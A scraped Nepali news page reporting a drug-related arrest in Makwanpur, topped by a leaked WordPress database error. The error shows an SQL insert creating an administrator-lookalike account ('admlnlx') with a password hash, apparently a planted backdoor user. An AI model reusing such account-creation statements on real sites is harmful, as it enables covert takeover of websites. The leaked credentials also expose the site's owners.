WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BnqDYiu4PUTQz8ppRSZFarlsyYZwUA.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 16:44:02', '', 'admlnlx', 'admlnlx')

लागूऔषधसहित एक पक्राउ – Gaule Khabar

लागूऔषधसहित एक पक्राउ

लागूऔषधसहित एक पक्राउ

काठमाण्डौ । लागूऔषध कारोबारमा संलग्न एक महिलालाई प्रहरीले पक्राउ गरेको छ ।

पक्राउ पर्नेमा हेटौँडा–१९, बस्तीपुरमा डेरा गरी बस्ने बकैया गाउँपालिका–४, छतिवनकी २९ वर्षीया नानीमायाँ खत्री रहेको जिल्ला प्रहरी कार्यालय मकवानपुरले जनाएको छ । प्राप्त सूचनाका आधारमा प्रहरी टोलीले उनलाई पक्राउ गरी शनिबार सार्वजनिक गरेको जिल्ला प्रहरी कार्यालय मकवानपुरका प्रहरी निरीक्षक देवेन्द्र दासले जानकारी दिए ।

उहाँका अनुसार, खत्रीको डेराबाट प्रहरीले डाइजेपाम २८० एम्पुल, फेनार्गन २६८ एम्पुल र नुर्फिन २५० एम्पुल बरामद गरेको छ । पक्राउ परेका खत्रीमाथि आवश्यक अनुसन्धान गर्नाका साथै उक्त घटनामा संलग्न अन्यको खोजीकार्य भइरहेको छ । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका